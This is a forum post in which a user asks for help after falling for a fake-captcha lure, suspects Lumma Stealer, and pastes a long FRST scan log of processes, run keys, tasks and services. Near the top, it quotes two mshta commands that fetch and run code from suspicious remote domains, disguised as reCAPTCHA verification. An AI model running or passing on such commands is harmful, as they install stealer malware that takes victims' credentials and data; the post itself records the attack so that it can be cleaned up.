Log analysis and evaluation: Windows 11: Suspected infection with Lumma?-Stealer after fake captcha
Yesterday, 14:37 | #1

Windows 11: Suspected infection with Lumma?-Stealer after fake captcha

Hello Trojaner-Board community,

I made a mistake and am now looking for your help in evaluating the FRST logs. While visiting the invoiz.de website I fell for a fake captcha. Normally no captcha appears there. This time, however, the "I am not a robot" checkbox (which is common on other websites) appeared. After a short loading time I was prompted to open the Run window (Win+R) and execute the following command:

Code:
mshta https://solve.vwglq.com/awjxs.captcha?u=790e6686-a761-4684-a3f9-feab893b31f6 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 4285''

Code:
mshta https://check.qlkwr.com/awjsx.captcha?u=56020c71-bea1-4468-9e4a-7400c2c12f95 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 8306''

I disconnected the network connections fairly promptly and shut down the computer. During my research I learned that this is probably some kind of stealer, or rather the Lumma Stealer. I found the following article about it: https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha

However, I could not find the indicators on the file system as they are described in the article. Here are the logs:

FRST.txt
Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 04-01-2025 durchgeführt von Lisa (Administrator) auf E595 (LENOVO 20NF0000GE) (06-01-2025 12:18:51) Gestartet von C:\Users\Lisa\Downloads\FRST64_0125.exe Geladene Profile: Lisa Plattform: Microsoft Windows 11 Pro Version 23H2 22631.4602 (X64) Sprache: Deutsch (Deutschland) Standard-Browser: Chrome Start-Modus: Normal ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (5699BA41-022E-4685-9AD3-95C4C30DE78D -> Conexant Systems LLC.) C:\Program Files\WindowsApps\22094SynapticsIncorporate.SmartAudio3_1.0.85.0_x64__qt57b6kdvhcfw\SA3\SmartAudio3.exe (5699BA41-022E-4685-9AD3-95C4C30DE78D -> Conexant Systems, Inc) C:\Program Files\WindowsApps\22094SynapticsIncorporate.SmartAudio3_1.0.85.0_x64__qt57b6kdvhcfw\Flow\Flow1\Flow.exe (5699BA41-022E-4685-9AD3-95C4C30DE78D -> Conexant Systems, Inc.) C:\Program Files\WindowsApps\22094SynapticsIncorporate.SmartAudio3_1.0.85.0_x64__qt57b6kdvhcfw\AFA\CAudioFilterAgent64.exe (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe <2> (C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.30502.30.0_x64__cw5n1h2txyewy\WidgetBoard.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.112\msedgewebview2.exe <8> (C:\Program Files\Wireshark\Wireshark.exe ->) (Wireshark Foundation -> The Wireshark developer community) C:\Program Files\Wireshark\dumpcap.exe (DriverStore\FileRepository\u0395847.inf_amd64_7b3125a3a274bd68\B395725\atiesrxx.exe ->) (Advanced Micro Devices Inc. 
-> AMD) C:\Windows\System32\DriverStore\FileRepository\u0395847.inf_amd64_7b3125a3a274bd68\B395725\atieclxx.exe (explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <18> (explorer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe (explorer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe (explorer.exe ->) (Wireshark Foundation -> The Wireshark developer community, hxxps://www.wireshark.org/) C:\Program Files\Wireshark\Wireshark.exe (Microsoft Corporation -> ) C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_11.2410.21.0_x64__8wekyb3d8bbwe\Notepad\Notepad.exe <4> (Notepad++ -> Don HO don.h@free.fr) C:\Program Files\Notepad++\notepad++.exe (services.exe ->) () [Datei ist nicht signiert] C:\Program Files (x86)\DSDCS\InputMapper 1.7\HidGuardian\InputMapperCerberusWhitelister.exe (services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (services.exe ->) (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.) C:\Windows\System32\amdfendrsr.exe (services.exe ->) (Advanced Micro Devices Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\u0395847.inf_amd64_7b3125a3a274bd68\B395725\atiesrxx.exe (services.exe ->) (Citrix Systems, Inc. -> Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\Receiver\UpdaterService.exe (services.exe ->) (Conexant Systems LLC -> Conexant Systems, Inc.) C:\Windows\CxSvc\CxUtilSvc.exe (services.exe ->) (Debauchee Open Source Group) [Datei ist nicht signiert] C:\Program Files\Barrier\barrierd.exe (services.exe ->) (Dolby Laboratories, Inc. -> ) C:\Windows\System32\dolbyaposvc\DAX3API.exe <2> (services.exe ->) (Lenovo -> Lenovo) C:\Windows\System32\DriverStore\FileRepository\ibmpmdrv.inf_amd64_7b52940a5893ba07\x64\ibmpmsvc.exe (services.exe ->) (Lenovo -> Lenovo.) 
C:\Windows\System32\DriverStore\FileRepository\litsdrv.inf_amd64_64fe83bb6fa2a9a7\x64\LITSSvc.exe (services.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_updater.exe (services.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Windows\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray_service.exe (services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\WSL\wslservice.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpDefenderCoreService.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MsMpEng.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\NisSrv.exe (services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor Corp.) C:\Windows\RtkBtManServ.exe (services.exe ->) (Synaptics Incorporated -> Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe (services.exe ->) (Synaptics Incorporated -> Conexant Systems LLC.) C:\Windows\CxSvc\CxAudioSvc.exe (services.exe ->) (Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPEnhService.exe (services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe (services.exe ->) (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.) 
C:\Program Files\Common Files\Zoom\Support\CptService.exe (sihost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.StartExperiencesApp_1.1.200.0_x64__8wekyb3d8bbwe\MicrosoftStartFeedProvider\MicrosoftStartFeedProvider.exe (svchost.exe ->) (Lenovo -> Lenovo) C:\Windows\SysWOW64\Lenovo\PowerMgr\PowerMgr.exe (svchost.exe ->) (Microsoft Corporation -> ) C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\OpenConsole.exe (svchost.exe ->) (Microsoft Corporation -> ) C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21.3231.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.30502.30.0_x64__cw5n1h2txyewy\WidgetBoard.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2> (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\CHXSmartScreen.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPHelper.exe (SynTPEnhService.exe ->) (Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPEnh.exe ==================== Registry (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [4116904 2024-10-23] (Adobe Inc. 
-> Adobe Systems, Incorporated) HKLM\...\Run: [SteelSeriesGG] => C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe [12891520 2022-12-07] (SteelSeries ApS -> SteelSeries ApS) HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3089288 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.) HKLM\...\Run: [RTKUGUI] => "C:\WINDOWS\system32\RtkUGui64.exe" -s (Keine Datei) HKLM-x32\...\Run: [Qsync] => C:\Program Files (x86)\QNAP\Qsync\Qsync.exe [94901072 2023-08-30] (QNAP Systems, Inc. -> QNAP Systems, Inc.) HKLM-x32\...\Run: [InstallHelper] => C:\Program Files (x86)\Citrix\Citrix Workspace 2409\InstallHelper.exe [683296 2024-12-09] (Citrix Systems, Inc. -> Citrix Systems, Inc.) HKLM-x32\...\Run: [AnalyticsSrv] => C:\Program Files (x86)\Citrix\ICA Client\Receiver\AnalyticsSrv.exe [2901856 2024-12-06] (Citrix Systems, Inc. -> Citrix Systems, Inc.) HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [3108456 2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.) HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [1067624 2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.) HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Beschränkung <==== ACHTUNG HKLM\SYSTEM\...\Terminal Server: [fDenyTSConnections] = 0 <==== ACHTUNG HKU\S-1-5-19\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\101.0.3.0\GoogleDriveFS.exe [61998176 2024-12-17] (Google LLC -> Google, Inc.) HKU\S-1-5-20\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\101.0.3.0\GoogleDriveFS.exe [61998176 2024-12-17] (Google LLC -> Google, Inc.) HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4375912 2023-09-29] (Valve Corp. 
-> Valve Corporation) HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [37180368 2023-12-28] (Epic Games Inc. -> Epic Games, Inc.) HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\101.0.3.0\GoogleDriveFS.exe [61998176 2024-12-17] (Google LLC -> Google, Inc.) HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [MicrosoftEdgeAutoLaunch_EAC21D00D4BC08C838A9AA4DBEEC9392] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3911240 2024-12-19] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [LGHUB] => C:\Program Files\LGHUB\system_tray\lghub_system_tray.exe [22365592 2024-10-29] (Logitech Inc -> Logitech, Inc.) HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [Docker Desktop] => C:\Program Files\Docker\Docker\Docker Desktop.exe [281392 2023-04-12] (Docker Inc -> Docker Inc.) HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [EADM] => C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALauncher.exe [2668648 2023-06-13] (Electronic Arts, Inc. -> Electronic Arts) HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [Discord] => C:\Users\Marcel\AppData\Local\Discord\Update.exe [1525024 2023-09-18] (Discord Inc. 
-> GitHub) HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\Marcel\AppData\Local\Microsoft\Teams\Update.exe [2591920 2024-03-02] (Microsoft 3rd Party Application Component -> Microsoft Corporation) HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Run: [GoogleChromeAutoLaunch_11F810DC58703105CF0600BCC1ED96D2] => "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5 [3012192 2024-12-17] (Google LLC -> Google LLC) HKU\S-1-5-21-1775496863-3233068474-2158662417-1002\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\101.0.3.0\GoogleDriveFS.exe [61998176 2024-12-17] (Google LLC -> Google, Inc.) HKU\S-1-5-18\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\101.0.3.0\GoogleDriveFS.exe [61998176 2024-12-17] (Google LLC -> Google, Inc.) HKLM\...\Print\Monitors\pdfcmon: C:\WINDOWS\system32\pdfcmon.dll [181248 2022-05-19] (pdfforge GmbH) [Datei ist nicht signiert] HKLM\Software\...\AppCompatFlags\Custom\AuthManSvr.exe: [{e06cf029-144b-4f2a-9621-b4f659aa6952}.sdb] -> Citrix Workspace HKLM\Software\...\AppCompatFlags\InstalledSDB\{e06cf029-144b-4f2a-9621-b4f659aa6952}: [DatabasePath] -> C:\WINDOWS\AppPatch\CustomSDB\{e06cf029-144b-4f2a-9621-b4f659aa6952}.sdb [2024-12-06] HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\131.0.6778.205\Installer\chrmstp.exe [2024-12-27] (Google LLC -> Google LLC) HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{60f15951-e7ef-11ea-b28e-c4b301b9ed33}] -> C:\Program Files (x86)\Citrix\ICA Client\CitrixEnterpriseBrowser\130.1.1.12\Installer\chrmstp.exe [2024-10-23] (Citrix Systems, Inc. -> Citrix Systems, Inc.) 
IFEO\CompatTelRunner.exe: [Debugger] %windir%\System32\taskkill.exe IFEO\software_reporter_tool.exe: [Debugger] %windir%\System32\taskkill.exe Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk [2022-08-11] ShortcutTarget: AnyDesk.lnk -> C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH) GroupPolicy: Beschränkung ? <==== ACHTUNG Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) Task: {F9DBE791-D220-4CAF-8F59-1385725B4DA4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1574856 2024-09-25] (Adobe Inc. -> Adobe Inc.) Task: {72FC45C7-F0A9-4BDB-BDCF-B096B6446D53} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [4116904 2024-10-23] (Adobe Inc. -> Adobe Systems, Incorporated) Task: {05FFDA11-9DC4-499C-81DA-8C607FDA1BDB} - System32\Tasks\Adobe-Genuine-Software-Integrity-Scheduler-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [4455336 2024-10-23] (Adobe Inc. 
-> Adobe Systems, Incorporated) Task: {0D9AFC2E-5E0A-436E-B0BC-9DCD6B7D368F} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\Windows\explorer.exe [5575576 2024-12-10] (Microsoft Windows -> Microsoft Corporation) Task: {9D35EB52-8B63-4A90-BE13-4836E5C61D01} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem132.0.6833.0{42FE6726-4BBB-46EB-AFD6-EF31194095DA} => C:\Program Files (x86)\Google\GoogleUpdater\132.0.6833.0\updater.exe [5591136 2024-11-11] (Google LLC -> Google LLC) Task: {53670166-5227-4913-8A6C-5E573788B5E6} - System32\Tasks\Lenovo\Power Manager\Background monitor => C:\WINDOWS\SysWOW64\Lenovo\PowerMgr\PowerMgr.exe [129368 2024-06-26] (Lenovo -> Lenovo) Task: {1A413F9F-6CE5-4A52-B9E5-50AFDE2B7232} - System32\Tasks\Lenovo\Power Manager\Uninstall task => C:\WINDOWS\SysWOW64\PowerMgrInst.exe [67424 2024-06-26] (Lenovo -> ) Task: {4C51E860-22D5-4DB3-87A3-1DF4834AD328} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23570544 2024-11-27] (Microsoft Corporation -> Microsoft Corporation) Task: {44929D8A-ACF1-43C8-B9CF-8FE1B8A361E0} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23570544 2024-11-27] (Microsoft Corporation -> Microsoft Corporation) Task: {20E99461-6A3B-49E0-90D9-D481F7D711A8} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2209888 2024-12-13] (Microsoft Corporation -> Microsoft Corporation) Task: {357DFAC2-A53D-4B82-8E92-DF058D80106D} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2209888 2024-12-13] (Microsoft Corporation -> Microsoft Corporation) Task: {7E747EBD-CD0A-4FB5-8002-94C0EF4EBD12} - 
System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [3514936 2024-12-13] (Microsoft Corporation -> Microsoft Corporation) Task: {354006FC-B9E8-46EA-A9C6-5C83F5BC0C32} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [3514936 2024-12-13] (Microsoft Corporation -> Microsoft Corporation) Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Keine Datei) Task: {C970DF4C-F292-4407-B5E9-978DFD15E681} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpCmdRun.exe [1687360 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {F90C6CEE-A6CF-416E-BAB2-560FFA3EB1EF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpCmdRun.exe [1687360 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {4C57A0B7-30DE-4B3A-B627-7ED951065754} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpCmdRun.exe [1687360 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {2820F1F9-8402-4C3E-B45D-B483F485017C} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpCmdRun.exe [1687360 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {4C5C5E12-ED79-4B0D-8459-3C07FA416D70} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [815 2022-11-22] () [Datei ist nicht signiert] Task: {9629FA7F-0076-4628-85C0-A1888D18294B} - System32\Tasks\ViGEmBusUpdater => 
C:\Program Files\Nefarius Software Solutions\ViGEm Bus Driver\ViGEmBusUpdater.exe [901144 2019-05-10] (Nefarius Software Solutions e.U. -> Nefarius Software Solutions e.U.) (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Hosts: 127.0.0.1 kubernetes.docker.internal Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{1b5a7009-2370-4b1f-93e2-0dbe50e952a6}: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{1b5a7009-2370-4b1f-93e2-0dbe50e952a6}: [DhcpDomain] gn1.roell-online.de Tcpip\..\Interfaces\{916ef776-90f9-486c-8951-25c9e3d27853}: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{916ef776-90f9-486c-8951-25c9e3d27853}: [DhcpDomain] gn1.roell-online.de Tcpip\..\Interfaces\{916ef776-90f9-486c-8951-25c9e3d27853}\3516E6471637353686C696474756E675C616E6: [DhcpNameServer] 192.168.65.37 Tcpip\..\Interfaces\{f6efe30a-0696-4958-abc2-6b82cf54b596}: [DhcpNameServer] 10.42.0.1 Edge: ======= Edge Profile: C:\Users\Lisa\AppData\Local\Microsoft\Edge\User Data\Default [2022-02-28] FireFox: ======== FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation) FF Plugin: @videolan.org/vlc,version=3.0.18 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2022-11-08] (VideoLAN -> VideoLAN) FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2024-12-05] (Adobe Inc. -> Adobe Systems Inc.) 
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2022-02-28] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation) Chrome: ======= CHR Profile: C:\Users\Lisa\AppData\Local\Google\Chrome\User Data\Default [2025-01-06] CHR HomePage: Default -> hxxps://www.google.de/ CHR Extension: (Google Docs Offline) - C:\Users\Lisa\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-12-27] CHR Extension: (Anwendungs-Launcher für Drive (von Google)) - C:\Users\Lisa\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2023-08-25] CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Lisa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2022-02-28] CHR HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] CHR HKU\S-1-5-21-1775496863-3233068474-2158662417-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] ==================== Dienste (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [172992 2024-09-25] (Adobe Inc. -> Adobe Inc.) S2 AnyDesk; C:\Program Files (x86)\AnyDesk\AnyDesk.exe [3910472 2024-02-09] (AnyDesk Software GmbH -> AnyDesk Software GmbH) S3 appprotectionsvc; C:\Program Files (x86)\Citrix\ICA Client\appprotection.exe [729664 2024-12-06] (Citrix Systems, Inc. 
-> Citrix Systems, Inc.) R2 Barrier; C:\Program Files\Barrier\barrierd.exe [450048 2021-11-01] (Debauchee Open Source Group) [Datei ist nicht signiert] R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9498224 2024-11-27] (Microsoft Corporation -> Microsoft Corporation) S3 com.docker.service; C:\Program Files\Docker\Docker\com.docker.service [19792 2023-04-12] (Docker Inc -> Docker Inc.) S3 CtxAdpPolicy; C:\Program Files (x86)\Citrix\AppDataProtection\CtxAdpPolicy.exe [330608 2024-10-29] (Citrix Systems, Inc. -> Citrix Systems, Inc.) S3 CtxPkm; C:\Program Files (x86)\Citrix\AppDataProtection\CtxPkm.exe [1303392 2024-10-29] (Citrix Systems, Inc. -> Citrix Systems, Inc.) R2 CWAUpdaterService; C:\Program Files (x86)\Citrix\ICA Client\Receiver\UpdaterService.exe [1708320 2024-12-06] (Citrix Systems, Inc. -> Citrix Systems, Inc.) R2 CxAudioSvc; C:\WINDOWS\CxSvc\CxAudioSvc.exe [94496 2022-03-29] (Synaptics Incorporated -> Conexant Systems LLC.) R2 CxAudMsg; C:\WINDOWS\System32\CxAudMsg64.exe [244512 2022-03-29] (Synaptics Incorporated -> Conexant Systems Inc.) S2 CxUIUSvc; C:\WINDOWS\System32\CxUIUSvc64.exe [123144 2022-03-29] (Synaptics Incorporated -> Conexant Systems, Inc.) R2 DolbyDAXAPI; C:\WINDOWS\system32\dolbyaposvc\DAX3API.exe [1926600 2019-09-02] (Dolby Laboratories, Inc. -> ) S3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [11459176 2023-06-13] (Electronic Arts, Inc. -> Electronic Arts) S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1136552 2023-05-12] (EasyAntiCheat Oy -> Epic Games, Inc) S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2023-05-12] (Epic Games Inc. -> Epic Games, Inc.) 
R2 IBMPMSVC; C:\WINDOWS\System32\DriverStore\FileRepository\ibmpmdrv.inf_amd64_7b52940a5893ba07\x64\ibmpmsvc.exe [1031024 2023-06-20] (Lenovo -> Lenovo) R2 InputMapper Cerberus Whitelister; C:\Program Files (x86)\DSDCS\InputMapper 1.7\HidGuardian\InputMapperCerberusWhitelister.exe [15360 2020-01-10] () [Datei ist nicht signiert] S4 LenovoBrightCtrl; C:\WINDOWS\System32\DriverStore\FileRepository\litsdrv.inf_amd64_64fe83bb6fa2a9a7\x64\BrightnessControl.exe [160080 2024-07-29] (Lenovo -> Lenovo.) R2 LGHUBUpdaterService; C:\Program Files\LGHUB\lghub_updater.exe [11712920 2024-10-29] (Logitech Inc -> Logitech, Inc.) R2 LITSSVC; C:\WINDOWS\System32\DriverStore\FileRepository\litsdrv.inf_amd64_64fe83bb6fa2a9a7\x64\LITSSvc.exe [1099592 2024-07-29] (Lenovo -> Lenovo.) R2 logi_lamparray_service; C:\WINDOWS\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray_service.exe [11177064 2024-10-30] (Logitech Inc -> Logitech, Inc.) S2 LPlatSvc; C:\WINDOWS\System32\DriverStore\FileRepository\ibmpmdrv.inf_amd64_7b52940a5893ba07\x64\LPlatSvc.exe [915824 2023-06-20] (Lenovo -> Lenovo) R2 MDCoreSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpDefenderCoreService.exe [1447680 2024-10-30] (Microsoft Windows Publisher -> Microsoft Corporation) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [559368 2024-11-13] (Microsoft Windows Publisher -> Microsoft Corporation) S3 SteelSeriesUpdateService; C:\Program Files\SteelSeries\GG\SteelSeriesUpdateService.exe [35192 2022-12-07] (SteelSeries ApS -> ) R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [22442808 2024-09-03] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) S3 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [804296 2023-07-12] (Oracle Corporation -> Oracle and/or its affiliates) S3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10430256 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.) 
